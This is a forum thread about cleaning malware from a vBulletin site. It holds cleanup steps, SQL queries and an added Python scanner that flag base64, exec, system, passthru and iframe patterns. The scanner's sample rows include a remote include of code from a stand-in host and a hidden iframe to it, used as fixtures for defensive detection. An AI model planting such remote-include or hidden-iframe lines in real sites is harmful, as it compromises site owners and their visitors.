Malware removal services - anyone used them before?

  • 04wayne
    Senior Member
    • Jul 2009
    • 424
    • 6.0.X

    [Forum] Malware removal services - anyone used them before?

    Just a basic question - anybody that has had a site infected with malware, have you ever used a malware removal service? Such as the one offered by: http://sucuri.net/ ?

    I'm really tempted to spend the money, as I don't have the time at the moment to learn how to remove the malware myself. Just wondered whether anyone had experience with these kinds of services.
  • Wayne Luke
    vBulletin Technical Support Lead
    • Aug 2000
    • 74172

    #2
    Never used them and wouldn't do so.

    1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

    2) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

    3) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you.

    4) Check your plugins for any base64 code. I recommend against using any plugins or products that include base64 code in them. However, some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

    5) Make sure that your plugins do not include calls to exec(), system(), or passthru() or iframes. These are also often signs of a hacked site.

    Query for step 4 and 5 -
    SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode LIKE '%passthru%' OR phpcode LIKE '%iframe%';

    6) Run this query:
    SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template LIKE '%passthru%' OR template LIKE '%iframe%';
    Translations provided by Google.

    Wayne Luke
    The Rabid Badger - a vBulletin Cloud demonstration site.
    vBulletin 5 API
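
The checks in steps 2 to 5 of the reply above, as an added example that is not part of the original post or of vBulletin. It assumes the rows returned by the two queries have been exported as dicts; the `scan` function, the pattern table and the sample rows are constructed for illustration.

```python
import re

# Step 2: the only templates where iframe tags are expected.
IFRAME_ALLOWED = {
    "bbcode_video", "editor-ie.css", "member.css", "stylegenerator.css",
    "vbcms.css", "vbulletin.css", "help_bbcodes", "humanverify_recaptcha",
    "search_common", "search_common_select_type",
}

# Steps 3-5 as patterns. Function names are matched as calls on a word
# boundary, so "filesystem" or "executed" do not match the way
# LIKE '%system%' and LIKE '%exec%' do.
CHECKS = {
    "include": re.compile(r"\b(?:include|require)(?:_once)?\b[^;]*", re.I),
    "base64": re.compile(r"base64\w*", re.I),
    "exec": re.compile(r"\b(?:exec|system|passthru)\s*\(", re.I),
    "iframe": re.compile(r"<\s*iframe\b[^>]*", re.I),
}

def scan(rows, code_col, is_template=False):
    """Return (title, check, matched_text) for every row that needs review."""
    findings = []
    for row in rows:
        for check, rx in CHECKS.items():
            if is_template and check == "include":
                continue  # step 3 is about plugin PHP code
            if is_template and check == "iframe" and row["title"] in IFRAME_ALLOWED:
                continue  # step 2 allowlist
            m = rx.search(row[code_col])
            if m:
                findings.append((row["title"], check, m.group(0)[:60]))
    return findings

# Constructed sample rows (not from a real site), shaped like the columns
# the two queries select from the plugin and template tables.
PLUGINS = [
    {"title": "Stats", "phpcode": "$fs = 'filesystem'; $executed = true;"},
    {"title": "Init", "phpcode": "include_once('http://example.invalid/x.php');"},
    {"title": "Lite addon", "phpcode": "$x = base64_decode($blob);"},
    {"title": "Cron", "phpcode": "system($cmd);"},
]
TEMPLATES = [
    {"styleid": 1, "title": "bbcode_video", "template": '<iframe src="{vb:raw url}"></iframe>'},
    {"styleid": 1, "title": "footer", "template": '<iframe src="http://example.invalid/" width="0"></iframe>'},
]

if __name__ == "__main__":
    for finding in scan(PLUGINS, "phpcode") + scan(TEMPLATES, "template", True):
        print(finding)
```

Every include or require is reported rather than only remote ones, since step 3 asks that each included file be known to you.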


    • whitey10tc
      Senior Member
      • Jan 2011
      • 415
      • 4.0.x

      #3
      What Wayne suggests is the easiest/cheapest/fastest way.
      Now if you check out the report on your site, it shows a high amount of sites on your host being attacked. I assume you're on shared hosting, I would "make" the host take care of it quickly! or move to a better host. I'd move to a different host if they even hesitated on helping.
      Diagnostic page for AS29550 (SIMPLYTRANSIT)

      What happened when Google visited sites hosted on this network?
      Of the 25831 site(s) we tested on this network over the past 90 days, 715 site(s), including, for example, "links removed" served content that resulted in malicious software being downloaded and installed without user consent.
      The last time Google tested a site on this network was on 2011-12-12, and the last time suspicious content was found was on 2011-12-12.
      Has this network hosted sites acting as intermediaries for further malware distribution?
      Over the past 90 days, we found 29 site(s) on this network, including, for example, "links removed", that appeared to function as intermediaries for the infection of 70 other site(s) including, for example, "links removed".
      Has this network hosted sites that have distributed malware?
      Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 33 site(s), including, for example, "links removed" that infected 78 other site(s), including, for example, "links removed"

      www.cdmagurus.com
      www.cellphone-gurus.com


      • IceFanatic
        Member
        • Jun 2004
        • 70

        #4
        Originally posted by whitey10tc
        What Wayne suggests is the easiest/cheapest/fastest way.
        Now if you check out the report on your site, it shows a high amount of sites on your host being attacked. I assume you're on shared hosting, I would "make" the host take care of it quickly! or move to a better host. I'd move to a different host if they even hesitated on helping.
        How do you run this report? I too am having malware issues at the moment...


        • whitey10tc
          Senior Member
          • Jan 2011
          • 415
          • 4.0.x

          #5
          Originally posted by IceFanatic
          How do you run this report? I too am having malware issues at the moment...
          In the OP's case, last night Google was showing an attack page warning with a link to the info. Short of that you can find more info on the malware issue you're having in Google's webmaster tools. To cure it try what Wayne suggests above.
          www.cdmagurus.com
          www.cellphone-gurus.com


          • 04wayne
            Senior Member
            • Jul 2009
            • 424
            • 6.0.X

            #6
            My host is basically refusing to help, as their malware scanner isn't picking up any errors.


            • Wayne Luke
              vBulletin Technical Support Lead
              • Aug 2000
              • 74172

              #7
              Originally posted by 04wayne
              My host is basically refusing to help, as their malware scanner isn't picking up any errors.
              You'll need to open a ticket then.
              Translations provided by Google.

              Wayne Luke
              The Rabid Badger - a vBulletin Cloud demonstration site.
              vBulletin 5 API


              • aussiefooty
                Senior Member
                • Nov 2008
                • 1904
                • 6.0.X

                #8
                Malware removal services - anyone used them before?

                Have you tried AVG that is free anti virus software? That will stop malware from happening.
                Aussiefootyforums

                New Site New forum
                Come and talk sports all day long



                • Trevor Hannant
                  vBulletin Support
                  • Aug 2002
                  • 24359
                  • 5.7.X

                  #9
                  Originally posted by carntheroos4eva
                  Have you tried AVG that is free anti virus software? That will stop malware from happening.
                  Can that be installed on web servers?
                  Vote for:

                  - Admin Settable Paid Subscription Reminder Timeframe (vB6)
                  - Add Admin ability to auto-subscribe users to specific channel(s) (vB6)
